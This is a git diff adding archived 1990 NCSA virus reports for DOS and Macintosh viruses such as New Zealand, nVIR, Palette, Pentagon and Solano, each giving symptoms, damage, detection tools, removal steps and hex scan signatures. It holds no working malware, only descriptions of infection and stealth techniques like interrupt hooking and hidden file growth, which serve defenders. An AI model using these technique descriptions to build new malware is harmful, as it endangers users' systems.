disks. 
+ +Removal: The Stoned virus can be removed from 360KB diskettes by using +either the MDisk, CleanUp, or F-Prot programs. It can also be removed +from diskettes by using the DOS SYS command. Be sure to power down your +system and reboot from a clean, write-protected floppy prior to +attempting disinfection. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa097.txt b/textfiles.com/virus/NCSA/ncsa097.txt new file mode 100644 index 00000000..9a1d4e42 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa097.txt 
@@ -0,0 +1,71 @@ + Ŀ + VIRUS REPORT + New Zealand-B + + +Synonyms: Stoned-B. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of floppy disk and +partition table of hard disk. + +OnScreen Symptoms: The screen will sometimes display "Your PC is now +stoned!" + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Directly or indirectly corrupts file linkage. + +Detected by: Scanv56+, CleanUp, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot. + +Derived from: New Zealand. + +Scan Code: You can search at offset 043H for B8 01 02 0E 07 BB 00 02 33 +C9. + + This is a variation of New Zealand. Much of the code has been +reorganized. The only significant change in function, however, is that +the original boot sector is stored at track zero, head zero, sector seven +on a hard disk. The second string ("Legalise Marijuana!") is not +transferred when infecting a hard disk. The virus occupies space in the +hard disk's partition table. + + The hard disk is infected as soon as an infected floppy is booted. No +intentional damage is done by New Zealand-B, except systems with RLL +controllers will frequently hang. + + Removal instructions are the same as for the original New Zealand +virus for diskettes. However, an infected hard disk must be disinfected +by using MDisk with the /P parameter, with CleanUp, or NDD, because the +partition table has been infected. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. 
Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa098.txt b/textfiles.com/virus/NCSA/ncsa098.txt new file mode 100644 index 00000000..73a7fd5d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa098.txt 
@@ -0,0 +1,59 @@ + Ŀ + VIRUS REPORT + New Zealand-C + + +Synonyms: Stoned-C. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of floppy disk and +partition table of hard disk. + +OnScreen Symptoms: The screen will not display any message. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Directly or indirectly corrupts file linkage. + +Detected by: Scanv56+, CleanUp, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot. + +Derived from: New Zealand-B + + This is the Stoned-B virus that no longer displays the "Stoned" +message. This virus is difficult to detect. + + Removal instructions are the same as for the original New Zealand +virus for diskettes. However, an infected hard disk must be disinfected +by using MDisk with the /P parameter or CleanUp, because the partition +table has been infected. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. 
+ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa099.txt b/textfiles.com/virus/NCSA/ncsa099.txt new file mode 100644 index 00000000..6eb6b37f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa099.txt 
@@ -0,0 +1,53 @@ + Ŀ + VIRUS REPORT + New Zealand-D + + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects boot sector of 360K, 1.2M, and +1.44M disk. + +OnScreen Symptoms: The screen will sometimes display "Your PC is now +stoned!" + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector. Directly or indirectly corrupts file linkage. + +Detected by: Scanv56+, CleanUp, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot. + +Derived from: New Zealand (original) + +Scan Code: 1E 50 80 FC 02 72 17 80 FC 04 73 12 0A D2 75 0E 33 C0 8E D8 A0 +3F 04 A8 01 75 03 E8 07 00. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa100.txt b/textfiles.com/virus/NCSA/ncsa100.txt new file mode 100644 index 00000000..71330380 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa100.txt 
@@ -0,0 +1,87 @@ + Ŀ + VIRUS REPORT + nVIR + + +Host Machine: Macintosh. + + nVIR is a Macintosh virus that has now led to numerous strains, +including MEV#, AIDS, nFLU, and nVIR A and B. + + When you run an application infected with nVIR A or B on a clean +system, the infection spreads from the application to the system file. +After rebooting, the infection in turn spreads from the system to other +applications, as they are run. The effect can be devastating (see +sidebar). + + At first, nVIR A and B only replicate. When the system file is first +infected, a counter is initialized to 1000. The counter is decremented +by 1 each time the system is booted, and it is decremented by 2 each time +an infected application is run. + + When the counter reaches 0, nVIR A will sometimes either say "Don't +Panic" (if MacinTalk is installed in the system folder) or beep (if +MacinTalk is not installed in the system folder). This will happen on a +system boot with a probability of 1/16. It will also happen when an +infected application is launched with a probability of 31/256. In +addition, when an infected application is launched, nVIR A may say +"Don't Panic" twice or beep twice, with a probability of 1/256. + + When the counter reaches 0, nVIR B will sometimes beep. nVIR B does +not call MacinTalk. The beep will happen on a system boot with a +probability of 1/8. A single beep will happen when an infected +application is launched with a probability of 15/64. A double beep will +happen when an infected application is launched with a probability of +1/64. + + It is possible for nVIR A and nVIR B to mate and sexually reproduce, +resulting in new viruses combining parts of their parents. + + For example, if a system is infected with nVIR A, and if an +application infected with nVIR B is run on that system, part of the nVIR +B infection in the application is replaced by part of the nVIR A +infection from the system. 
The result contains part from each of its +parents, and behaves like nVIR A. + + Similarly, if a system is infected with nVIR B, and if an application +infected with nVIR A is run on that system, part of the nVIR A infection +in the application is replaced by part of the nVIR B infection from the +system. The result is very similar to its sibling described in the +previous paragraph, except that it has the opposite "sex" - each part is +from the opposite parent. It behaves like nVIR B. + + These offspring are new viruses. If they are taken to a clean system +they will infect that system, which will in turn infect other +applications. The descendents are identical to the original offspring. + + Incestual matings of these children with each other and with their +parents produce results that contain various combinations of parts from +their parents. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
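Review bot: the parenthetical "(see sidebar)" in the nVIR description (ncsa100.txt, "The effect can be devastating (see sidebar)") points at a sidebar that is not part of the added file; either carry the sidebar text over or drop the reference. Two spelling points in the same hunk: "descendents" should be "descendants", and "Incestual matings" should be "Incestuous matings".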
diff --git a/textfiles.com/virus/NCSA/ncsa101.txt b/textfiles.com/virus/NCSA/ncsa101.txt new file mode 100644 index 00000000..392a7b34 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa101.txt 
@@ -0,0 +1,82 @@ + Ŀ + VIRUS REPORT + Ohio + + +Date of Origin: May, 1989. + +Place of Origin: First reported at Ohio State University. May have +originated in Indonesia. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects 360K floppy boot sector. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDisk, F-Prot, or DOS SYS command. + +Derived from: May be an original. Den Zuk may have been derived from it. + +Scan Code: see below. + + The Ohio virus is a boot sector virus first discovered at Ohio State +University by Terry Reeves in May, 1989. It only infects 360K floppies. +It will infect any new diskette as soon as the diskette is accessed +(COPY, DIR, DEL, program load, etc.), similar to the Brain. The virus +will freeze the system if a <><><> is pressed and a cold +boot is then required. When the virus activates, the first copy of the +FAT becomes corrupted. No other symptoms have been reported. + + The Ohio virus is similar in many respects to the Den Zuk virus, and +may be an early version of Den Zuk. A diskette infected with Ohio will be +immune to infection by the Pakistani Brain virus. + + The following text strings appear in the Ohio virus: + +V I R U S + +b y + +The Hackers + +Y C 1 E R P + +D E N Z U K 0 + +Bandung 40254 + +Indonesia + +(C) 1988, The Hackers Team.... + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. 
+ + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa102.txt b/textfiles.com/virus/NCSA/ncsa102.txt new file mode 100644 index 00000000..06c952c9 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa102.txt 
@@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Oropax Virus + + +Synonyms: Music virus, Musician virus. + +Date of Origin: December, 1989. + +Host Machine: PC compatibles. + +Host Files: Remains resident; infects COM files. + +Increase in Size of Infected Files: length increases by 2756-2806 bytes, +so that total length is evenly divisible by 51. Most common length +increase is 2,773 bytes. + +Nature of Damage: Affects system run-time operation; corrupts program +files. + +Detected by: Scanv53+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, SCAN/D, F-Prot, or delete infected files. + + A memory resident virus infecting COM files. When an infected +application is executed, the virus installs in memory trapping the DOS +21h interrupt. Thereafter, when a program attempts to create a +subdirectory, remove a subdirectory, create a file, open a file, delete +a file, get/set file attributes, rename a file, delete a file (with FCB), +create file (with FCB) or rename a file (with FCB), one COM file is +infected in the home directory. COMMAND.COM, COM files with length +divisible by 51, COM files with an attribute other than normal or +archive, or COM files with a length of 61980 bytes will not be infected. +The virus seems to activate randomly after infecting a file. If +activated, five minutes after infection it will play 3 or 6 melodies +(depending on version) repeatedly with a 7 minute interval in between +each. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. 
+ + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa103.txt b/textfiles.com/virus/NCSA/ncsa103.txt new file mode 100644 index 00000000..5873e65b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa103.txt 
@@ -0,0 +1,84 @@ + Ŀ + VIRUS REPORT + Palette Virus + + +Synonyms: Zero Bug virus, 1536 virus + +Date of Origin: September, 1989. + +Place of Origin: The Netherlands + +Host Machine: PC compatibles. + +Host Files: COM files. Memory resident. + +Increase in Size of Infected Files: 1536 bytes. + +Detected by: Scanv38+, F-Prot. + +Removed by: Scan/D, F-Prot, or delete the infected files. + +Scan Code: EB 2B 90 5A 45 CD 60 2E C6 06 25 06 01 90 2E 80 3E 26 06 00 8D +3E 08 06 0E 07 75 5E 2E C6 06 26 06 05 90. + + This virus infects .COM files, causing them to grow by 1536 bytes, +but its main mission is to infect the copy of COMMAND.COM that is pointed +to by the environment variable COMSPEC. If COMSPEC does not point to +anything useful, the virus will install itself as a resident extension, +taking over INT 21h. + + From the moment the virus has infected COMMAND.COM or has installed +itself as a TSR, the virus will intercept DOS INT 21h, function calls 11h +(find first file), 12h (find next file), 57 (get/set file date & time), +3Eh (close file), 40h (write to file or device) and 3Ch (create file). + + All COM files that are accessed via function calls 3Ch, 3Eh and 40h +(by DOS itself or from any other program) will be infected by the virus. +This includes actions like COPY and XCOPY. Any COM file you create by +yourself via a compiler, linker, DEBUG or EXE2BIN will also be infected. + + The extra 1536 bytes in infected files will not show up when you +display a directory of your disk. The virus intercepts DOS function +calls Find First, Find Next and Get/Set file date & time. If a COM file +found by these DOS functions has been infected by the virus, the +information in the DTA (Disk Transfer Area) will be changed to show the +actual filesize minus 1536 bytes. DIR and most full-screen file +utilities (Like Norton and PCTOOLS) will be fooled by this trick. 
This +makes it very hard to detect the virus by simply checking the size of COM +files, because infected files will show up with their ORIGINAL size! + + If (and only if) the currently loaded COMMAND.COM is infected, the +virus will also hook the timer interrupt 1Ch. After a while a smiley face +(ASCII character 01) will move over your screen and "eat" all zeroes it +can find. Hence the name "Zero Bug" for this virus. The virus does not +format disks or erase files. + + The virus seems not to be spread very widely and may be rather new. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa104.txt b/textfiles.com/virus/NCSA/ncsa104.txt new file mode 100644 index 00000000..bfb2c74e --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa104.txt 
@@ -0,0 +1,53 @@ + Ŀ + VIRUS REPORT + Payday Virus + + +Date of Origin: November, 1989. + +Place of Origin: First isolated in the Netherlands. + +Host Machine: PC compatibles. + +Host Files: Remains resident; infects COM, EXE files. + +Increase in Size of Infected Files: 1808 bytes (EXE files) and 1813 bytes +(COM files). + +Nature of Damage: Corrupts program or overlay files. + +Detected by: Scanv51+, F-Prot. + +Removed by: CleanUp, M-JRUSLM, UnVirus, Saturday, F-Prot. + +Derived from: Jerusalem-B. + + This virus provides a simple change in the Jerusalem B, activating on +any Friday except Friday the 13th, hence the name "Payday". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa105.txt b/textfiles.com/virus/NCSA/ncsa105.txt new file mode 100644 index 00000000..af0eca99 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa105.txt 
@@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Pentagon Virus + + +Place of Origin: Washington, D.C. + +Host Machine: PC compatibles. + +Host Files: Resident. 360K floppy disk boot sector. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Corrupts or overwrites boot sector. + +Detected by: Scanv56+, F-Prot. + +Removed by: MDisk, CleanUp, or DOS SYS command. + +Scan Code: You can search at offset 03EH for 8E D8 FB BD 44 7C 81 76 06. + + The Pentagon virus consists of: + +* a normal MS-DOS 3.20 boot sector where the name "IBM" has been + replaced by "HAL". + +* A file with the name of the hex character 0F9H. This file contains the + portion of the virus code which would not fit into the boot sector, as + well as the original boot sector of the infected disk. This file is + addressed by its absolute address, rather than name. + +* A file named PENTAGON.TXT that does not appear to be used or contain + any data. Portions of this virus are encrypted. + + The Pentagon virus will look for and remove the Brain virus from any +disk that it infects. It is memory resident, occupying 5K of RAM, and can +survive a warm reboot. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. 
+ + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa106.txt b/textfiles.com/virus/NCSA/ncsa106.txt new file mode 100644 index 00000000..be057a9d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa106.txt 
@@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Perfume Virus + + +Synonyms: 765, 4711 + +Date of Origin: December, 1989 or earlier. + +Place of Origin: Poland or Germany. + +Host Machine: PC compatibles. + +Host Files: Non-resident. Infects COM files including COMMAND.COM + +Increase in Size of Infected Files: 765 bytes. + +Detected by: Scanv57+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: F-Prot or delete infected files. + +Derived from: Jerusalem + + The virus may ask you a question, and not infect should you answer +the question with "4711", the name of a German perfume. In the most +common version of this virus, however, the questions have been +overwritten with meaningless characters. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa107.txt b/textfiles.com/virus/NCSA/ncsa107.txt new file mode 100644 index 00000000..42dcca42 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa107.txt 
@@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Saratoga Virus + + +Synonyms: 642, One in Two + +Date of Origin: July, 1989 + +Place of Origin: Calfornia + +Host Machine: PC compatibles. + +Host Files: Memory resident. Infects EXE files. + +Increase in Size of Infected Files: 642 bytes. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or delete infected files. + +Derived from: Icelandic II? + + This virus appears to be derived from the Icelandic-II viruses. +Modifications include: + +* When Saratoga copies itself to memory, it modifies the memory block + so that it appears to belong to the operating system, thus preventing + reuse of the block. + +* Like Icelandic-II, this virus can infect programs which have been + marked Read-Only, though it does not restore the Read-Only attribute + to the file afterwards. + + Similar to the Icelandic-II virus, the Saratoga can infect programs +even if the system has installed an anti-viral TSR which "hooks" +interrupt 21, such as FluShot+. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. 
+ + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa108.txt b/textfiles.com/virus/NCSA/ncsa108.txt new file mode 100644 index 00000000..29bb9faf --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa108.txt 
@@ -0,0 +1,53 @@ + Ŀ + VIRUS REPORT + Saturday the 14th virus + + +Synonyms: Durban + +Date of Origin: March, 1990 + +Place of Origin: Durban, South Africa. + +Host Machine: PC compatibles. + +Host Files: COM (but not COMMAND.COM), EXE, and overlay files. Remains +resident. + +Increase in Size of Infected Files: 669-685 bytes. + +Nature of Damage: Overwrites the first 100 sectors of A:, B:, and C:, +destroying the boot sector, partition table, and FATs. + +Detected by: Scan v61+. + +Removed by: Scan/D, or delete whatever is infected. + + Activates on any Saturday the 14th. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa109.txt b/textfiles.com/virus/NCSA/ncsa109.txt new file mode 100644 index 00000000..383bf63b --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa109.txt 
@@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + SF Virus + + +Date of Origin: April, 1989. + +Place of Origin: California + +Host Machine: PC compatibles. + +Host Files: Memory resident. Infects floppy disk boot sector. + +Increase in Size of Infected Files: n/a + +Detected by: Scanv56+ (identifies it as the Alameda). + +Removed by: CleanUp, MDisk, F-Prot, or use the DOS SYS command. + +Derived from: Alameda + + A modification of the Alameda, the SF Virus activates when the +counter indicates it has infected 100 diskettes. The virus replicates +with each warm boot, infecting and reformatting any 360K disk in the +floppy drive. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa110.txt b/textfiles.com/virus/NCSA/ncsa110.txt new file mode 100644 index 00000000..f9c6028c --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa110.txt 
@@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Solano 2000 Virus + + +Synonyms: Dyslexia + +Date of Origin: February, 1990. + +Place of Origin: Solano County, California + +Host Machine: PC compatibles. + +Host Files: COM files. Remains resident. + +OnScreen Symptoms: May randomly reverse/transpose contiguous numbers in +the video buffer. + +Increase in Size of Infected Files: 2,000 bytes. + +Nature of Damage: May make infected files unusable. No intentional +damage. + +Detected by: Scanv60+. + +Removed by: Scan/D, or delete whatever is infected. + +Scan Code: Bytes 1168 through 1952 of any infected COM file will contain +"(" -- 28H. + + Once becoming memory resident, Solano will infect every COM file +run. Some infected programs will not run. The current version takes 3K of +RAM and does not survive a warm reboot. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
diff --git a/textfiles.com/virus/NCSA/ncsa111.txt b/textfiles.com/virus/NCSA/ncsa111.txt new file mode 100644 index 00000000..d5e73846 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa111.txt @@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Solano 2000-B Virus + + +Synonyms: Dyslexia + +Host Machine: PC compatibles. + +Host Files: COM files. Remains resident. + +OnScreen Symptoms: May transpose some numbers in the video buffer. + +Increase in Size of Infected Files: 2,000 bytes. + +Nature of Damage: May make infected files unusable. + +Detected by: Scanv60+. + +Removed by: Scan/D, or delete whatever is infected. + +Derived from: Solano 2000 + +Scan Code: Bytes 1168 through 1912 of any infected COM file will contain +the character that looks like the upper left corner of a single-line +box -- DA in hex. In other respects, the virus appears to be identical to +Solano 2000. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 
